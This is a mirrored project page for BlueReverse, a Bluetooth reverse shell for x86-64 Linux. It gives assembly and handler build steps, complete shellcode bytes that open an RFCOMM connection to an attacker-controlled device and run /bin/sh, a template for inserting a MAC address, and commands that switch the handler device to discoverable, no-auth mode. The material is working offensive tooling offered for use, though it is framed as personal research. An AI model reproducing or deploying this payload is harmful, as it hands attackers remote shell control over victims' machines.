Docker>> BlueReverse>> 返回
项目作者: Neetx

项目描述 :
Bluetooth reverse shell.
高级语言: Python
项目地址: git://github.com/Neetx/BlueReverse.git
创建时间: 2018-05-01T16:16:21Z
项目社区:https://github.com/Neetx/BlueReverse
开源协议:GNU General Public License v3.0
下载


BlueReverse

Bluetooth reverse shell currently for x86-64 Linux system.

Copyright (C) 2020 Neetx

BlueReverse is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

BlueReverse is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses

CONTACTS:

Neetx

BlueReverse has been implemented as personal research and fun. I provide you .asm file (client side), .py 2.7 file (server side) and the shellcode.

You must fill .asm and .py with your mac and with your desired channel for the communication. Then:

  1. nasm -f elf64 brev_shell.asm -o test.o
  2. ld test.o -o test

Now you must start the server:

  1. python bluereversehandler.py

And now you can launch test:

  1. ./test

You will get prompt on server side.
I tested the code with a rpi3 (server) and a Debian Stretch (client).

Shellcode:

If you need shellcode you can use my tool ShellcodeExtractor (https://github.com/Neetx/Shellcode-Extractor)

  1. objdump -D test.o | python shellcode_extractor.py

My output and lenght:

  1. \x6a\x29\x58\x6a\x01\x5e\x6a\x1f\x5f\x6a\x03\x5a\x0f\x05\x97\x6a\x02\x66\x5e\xb0\x21\x0f\x05\x83\xee\x01\x79\xf7\x48\x31\xc9\xb1\x03\x51\x48\xb9\xe0\xff\x9f\xea\xa3\x14\xd8\x47\x48\xf7\xd1\x51\x54\x5e\xb2\x0a\x48\x31\xc0\xb0\x2a\x0f\x05\x48\x31\xd2\x52\x5e\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05
  2. 82

You must do it by yourself because you have another MAC and maybe another channel.
If you don’t use my tool or another tool/command you have to put your MAC manually after NOT operation, because of this in .asm:

  1. mov rcx, ~0xXXXXXXXXXXXX001f        ;mac + family(1f=31)
  2. not rcx

(~ MAC + 00 (filler) + 1f (family))

00 is a nullbyte and to avoid it I use ~ , so the value after ~ is stored in the binary after a NOT operation and 00 become FF. Then i used “not rcx” to obtain the desired value.

Put your bluetooth MAC address here instead of \xXX\xXX\xXX\xXX\xXX\xXX, in little endian and after NOT operation:

  1. \x6a\x29\x58\x6a\x01\x5e\x6a\x1f\x5f\x6a\x03\x5a\x0f\x05\x97\x6a\x02\x66\x5e\xb0\x21\x0f\x05\x83\xee\x01\x79\xf7\x48\x31\xc9\xb1\x03\x51\x48\xb9\xe0\xff\xXX\xXX\xXX\xXX\xXX\xXX\x48\xf7\xd1\x51\x54\x5e\xb2\x0a\x48\x31\xc0\xb0\x2a\x0f\x05\x48\x31\xd2\x52\x5e\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05

Shellcode Generator

Instead of the previous steps you can use my generator.py (python >= 3.7) to get the shellcode

  1. python generator.py MAC CHANNEL

Test Shellcode:

Put your shellcode in the shellcode_tester.c, compile it and test.

Server Side

On the server side you should adapt and use bluereversehandler.py

  1. sudo hciconfig <device> piscan   
  2. sudo hciconfig <device> noauth   
  3. python2 bluereversehandler.py

An handler update will be released asap.

Screenshot

alt text